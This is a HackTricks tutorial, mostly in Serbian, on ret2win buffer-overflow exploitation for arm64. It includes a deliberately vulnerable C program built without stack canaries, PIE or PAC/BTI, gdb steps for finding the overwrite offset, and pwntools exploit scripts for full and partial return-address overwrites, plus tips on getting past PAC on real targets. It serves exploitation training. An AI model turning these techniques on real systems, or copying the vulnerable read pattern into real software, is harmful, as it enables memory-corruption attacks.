Ret2win - arm64

Reading time: 7 minutes

Pronađite uvod u arm64 u:

Introduction to ARM64v8

Kod

#include <stdio.h>
#include <unistd.h>

void win() {
printf("Congratulations!\n");
}

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kompajliraj bez pie i canary:

clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none

• Dodatni flag -mbranch-protection=none onemogućava AArch64 Branch Protection (PAC/BTI). Ako tvoj toolchain po defaultu uključuje PAC ili BTI, ovo održava lab reproducibilnim. Da proveriš da li kompajlirani binarni koristi PAC/BTI možeš:
• Potražiti AArch64 GNU properties:
• readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'
• Pregledati prologe/epiloge za paciasp/autiasp (PAC) ili za bti c landing padove (BTI):
• objdump -d ret2win | head -n 40

AArch64 calling convention quick facts

• Link register je x30 (takođe lr), i funkcije obično čuvaju x29/x30 sa stp x29, x30, [sp, #-16]! i vraćaju ih sa ldp x29, x30, [sp], #16; ret.
• To znači da sačuvana adresa povratka stoji na sp+8 u odnosu na bazu frejma. Sa char buffer[64] postavljenim ispod, uobičajena distanca prepisivanja do sačuvanog x30 je 64 (buffer) + 8 (sačuvani x29) = 72 bajta — upravo to ćemo naći dalje.
• Pokazivač stoga (SP) mora ostati poravnat na 16‑bajtnoj granici na granicama funkcija. Ako kasnije budeš pravio ROP lance za složenije scenarije, zadrži SP poravnanje ili možeš srušiti program u epilogama funkcija.

Pronalaženje offset-a

Opcija pattern-a

Ovaj primer je kreiran koristeći GEF:

Pokreni gdb sa GEF, kreiraj pattern i upotrebi ga:

gdb -q ./ret2win
pattern create 200
run

arm64 će pokušati da se vrati na adresu u registru x30 (koji je kompromitovan), možemo to iskoristiti da pronađemo pattern offset:

pattern search $x30

Offset je 72 (9x48).

Stack offset option

Počnite dobijanjem adrese stack-a na kojoj je smešten pc register:

gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame

Sada postavite breakpoint posle read() i nastavite dok se read() ne izvrši, pa postavite pattern као 13371337:

b *vulnerable_function+28
c

Pronađi gde je ovaj obrazac smešten u memoriji:

Zatim: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72

No PIE

Obično

Dohvati adresu funkcije win:

objdump -d ret2win | grep win
ret2win:     file format elf64-littleaarch64
00000000004006c4 <win>:

Exploit:

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Optional but nice for AArch64
context.arch = 'aarch64'

# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Off-by-1

Zapravo, ovo će više biti off-by-2 u spremljenom PC-u na stacku. Umesto da prepišemo ceo return address, prepišemo samo poslednja 2 bajta sa 0x06c4.

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Možete pronaći još jedan off-by-one primer za ARM64 na https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, koji je pravi off-by-one u fiktivnoj ranjivosti.

Sa PIE

Off-by-2

Bez leak-a ne znamo tačnu adresu win function, ali možemo odrediti offset funkcije u binary-ju, i pošto return address koji prepisujemo već pokazuje na blisku adresu, moguće je leak-ovati offset do win function (0x7d4) u ovom slučaju i jednostavno koristiti taj offset:

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Beleške o modernom AArch64 hardeningu (PAC/BTI) i ret2win

• If the binary is compiled with AArch64 Branch Protection, you may see paciasp/autiasp or bti c emitted in function prologues/epilogues. In that case:
• Returning to an address that is not a valid BTI landing pad may raise a SIGILL. Prefer targeting the exact function entry that contains bti c.
• If PAC is enabled for returns, naive return‑address overwrites may fail because the epilogue authenticates x30. For learning scenarios, rebuild with -mbranch-protection=none (shown above). When attacking real targets, prefer non‑return hijacks (e.g., function pointer overwrites) or build ROP that never executes an autiasp/ret pair that authenticates your forged LR.
• To check features quickly:
• readelf --notes -W ./ret2win and look for AARCH64_FEATURE_1_BTI / AARCH64_FEATURE_1_PAC notes.
• objdump -d ./ret2win | head -n 40 and look for bti c, paciasp, autiasp.

Pokretanje na hostovima koji nisu ARM64 (qemu‑user brz savet)

Ako ste na x86_64 ali želite da vežbate AArch64:

# Install qemu-user and AArch64 libs (Debian/Ubuntu)
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross

# Run the binary with the AArch64 loader environment
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win

# Debug with GDB (qemu-user gdbstub)
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
# In another terminal
gdb-multiarch ./ret2win -ex 'target remote :1234'

Povezane HackTricks stranice

Ret2syscall - ARM64

Ret2lib + Printf leak - arm64

Reference

• Omogućavanje PAC i BTI na AArch64 za Linux (Arm Community, nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
• Standard poziva procedura za Arm 64-bitnu arhitekturu (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst